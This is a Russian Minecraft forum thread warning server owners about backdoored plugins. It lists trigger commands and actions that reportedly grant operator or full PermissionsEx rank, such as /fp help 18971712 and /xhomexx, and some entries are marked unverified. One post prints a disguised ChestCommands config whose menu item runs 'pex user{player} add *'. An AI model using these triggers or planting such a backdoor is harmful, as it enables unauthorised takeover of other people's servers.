Список плагинов с уязвимостями
  • Автар пользователя

    17 июня 2016 - 02:23
    Вы не авторизованы, войдите на сайт.
  • просмотров 16307 | ответов 9
Описание:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью.
Способы получения админок очень разные и хитрые.
Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список:
1. aAntiSpam_v1.1 - способ взлома пока не известен.
2. Dupe - способ взлома пока не известен.
3. FloodProtect - Ударить по грязи три раза и прописать в чате команду /fp help 18971712
4. AntiBot - Берем рычаг в руки и нажимаем ПКМ.
5. Ural Paspport - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. Скрин.
6. HypixelPets - Прописать в чате команду /nethernetwork2skingworld76 (не проверено).
7. ProtocolLibFix - Прописать команду /protocollibfix:autoworld (Не проверено). /CM проверить есть ли плагин, потом крафтим табличку и пишем CMBest в чате появится: " у вас * ник: Поздравляю".
8. RegisterFix - Появляется меню ChestCommands, кликнуть на определённый предмет в меню.
9. BukkitApiEnhancer - Написать в чат /xhomexx (Не проверено).
иконка рекламы
РекламаЗаказать хостинг
Надёжный и качественный хостинг Minecraft 24/7 по доступным ценам.
Поддержка модов и плагинов, скоростные SSD диски и быстрая память DDR4.
  • Фото пользователя alex
    alex
    14 апреля 2017 - 19:58
Появился еще один плагин с уязвимостью RegisterFix
  • Фото пользователя

    14 апреля 2017 - 19:59
alex gamer сказал(а):
Появился еще один плагин с уязвимостью RegisterFix
Какой способ взлома? 
  • Фото пользователя alex
    alex
    14 апреля 2017 - 20:08
Сергей TU154 сказал(а):
Какой способ взлома? 
Способ взлома пока что не известен, мне ее скинули чтобы я ее установил за покупку доната. Я сделал вид что установил этот плагин, и потом мне написал этот человек что я не установил ее. После этого я ему написал на проверку что плагин с уязвимостью он начал грубить и добавил в ЧС. Могу скинуть этот плагин...
  • Фото пользователя alex
    alex
    14 апреля 2017 - 20:13
Сергей TU154 сказал(а):
Какой способ взлома? 
Нашел способ взлома!! Это переделанный ChestCommands только
menu-settings:   name: '&cВзлом опки.'   rows: 1   command:'register110011110' aa4:   COMMAND:'tell:&3Админка взломана!;console:pex user{player} add *'   NAME: '&eВзлом админки'   LORE: - ''   ID: '264'   POSITION-X: 5   POSITION-Y: 1
  • Фото пользователя

    14 апреля 2017 - 20:18
Добавил в список.
  • Фото пользователя Nextler
    Nextler
    23 августа 2017 - 15:06
Выход из всех ситуации настолько прост. Что нужно делать чтобы не было проблем с сервером: 1. Самим собирать сборку сервера 2. Устанавливать плагины он зарубежных авторов или от наших но только проверенных 3. Доверять свой сервер проверенным людям( то есть выдать администратора или оператора)4. Никому не давать доступ к своей сборке/консоли сервера. 5. 5 раз перечитать функционал плагина перед его установкой на сервер !!
  • Фото пользователя Женя
    Женя
    14 марта 2018 - 20:32
Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
  • Фото пользователя Сергей
    Сергей
    14 марта 2018 - 21:33
Женя Жека228 сказал(а): Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
Это ещё не весь список, есть и другие, так что будьте осторожнее.
  • Фото пользователя Вова
    Вова
    27 мая 2019 - 09:37
alex,  Боже все норм у меня стоит плагин за щита от взлома опки и рех и все все команды проверил не работаеют у меня пишут нет таокй команды + я за претил всем писать команду help так как она иметь просомтр плагинов